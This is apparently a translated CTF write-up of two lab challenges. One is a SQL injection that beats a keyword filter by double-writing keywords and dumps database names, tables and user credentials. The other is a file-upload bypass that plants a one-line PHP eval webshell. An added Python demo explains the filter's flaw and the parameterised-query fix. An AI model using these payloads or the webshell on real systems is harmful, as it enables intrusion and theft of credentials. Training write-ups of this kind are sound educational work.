[BUUCTF] [极客大挑战 2019] BabySQL
SQL injection: double-write bypass
The backend runs a replace function that finds keywords such as union and select and replaces them with the empty string.
To get past it, double-write each filtered keyword: split the word in half and hide a complete copy in the middle, so that after one pass of the filter the original word is left:
union -> ununionion
select -> seselectlect
from -> frfromom
where -> whwhereere
information -> infoorrmation (or is filtered)
order -> oorrder (or is filtered)
by -> bbyy
Common URL encodings
%20 space
%23 #
%27 '
1. Try closing the quote to trigger an error
The response contains no "or", only "1=1", so or is filtered; double-write it
?username=admin&password=pwd %27 oorr 1=1 %23
by is filtered as well; double-write it
?username=admin&password=pwd %27 oorrder bbyy 3 %23
?username=admin&password=pwd %27 oorrder bbyy 4 %23
There are three columns
?username=admin&password=pwd ' union select 1 #
Only "1 #" was left, which shows union and select were detected; double-write them and check the union query's echo
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 #
Doesn't work... uh,
The # here must be URL-encoded as %23, otherwise it doesn't work!
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23
Dump the databases
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) %23
?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23
Dump the tables
information is filtered; double-write it
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
Pick a table and dump its columns
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
Query the columns
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23
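Added example (not from the writeup) showing why the single-pass keyword filter above fails and what a defender should do instead: one extra pass exposes that the filter's output is not a fixpoint, and a parameterised query makes the keyword list unnecessary. The keyword list, the SQLite in-memory table and its rows are assumptions constructed for the demo.

```python
import re
import sqlite3

# Keywords the challenge's filter strips, as listed above (assumed list).
BLOCKED = ("union", "select", "from", "where", "information", "or", "by")


def naive_filter(value: str) -> str:
    """Single-pass keyword removal, modelled on the challenge's replace() filter."""
    for kw in BLOCKED:
        value = re.sub(re.escape(kw), "", value, flags=re.IGNORECASE)
    return value


def filter_is_fixpoint(value: str) -> bool:
    """Defender's check: if a second pass still changes the output, the first pass
    reassembled a blocked keyword (the double-write weakness)."""
    once = naive_filter(value)
    return naive_filter(once) == once


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample table (SQLite, in memory); not the challenge's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "secret"), (2, "alice", "hunter2")])
    return conn


def query_unsafe(conn: sqlite3.Connection, password: str) -> list:
    """Filter-then-concatenate: the pattern the writeup bypasses."""
    sql = "SELECT id, username FROM users WHERE password = '%s'" % naive_filter(password)
    return conn.execute(sql).fetchall()


def query_safe(conn: sqlite3.Connection, password: str) -> list:
    """Parameterised query: the value is bound as data, so no keyword list is needed."""
    return conn.execute(
        "SELECT id, username FROM users WHERE password = ?", (password,)
    ).fetchall()


if __name__ == "__main__":
    db = make_demo_db()
    payload = "pwd' oorr 1=1 --"          # SQLite comments with --, not #
    print(naive_filter(payload))           # pwd' or 1=1 --
    print(filter_is_fixpoint(payload))     # False
    print(len(query_unsafe(db, payload)))  # 2 (every row)
    print(query_safe(db, payload))         # []
```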
[ACTF2020 新生赛] Upload
Create test.php (a one-line webshell) with the following content
GIF89a<script language="php">eval($_POST['shell']);</script>
Capture the upload request and change the file extension to phtml; the upload succeeds and the response returns the stored file name
Then connect with 中国蚁剑 (AntSword), browse the directory, and it's done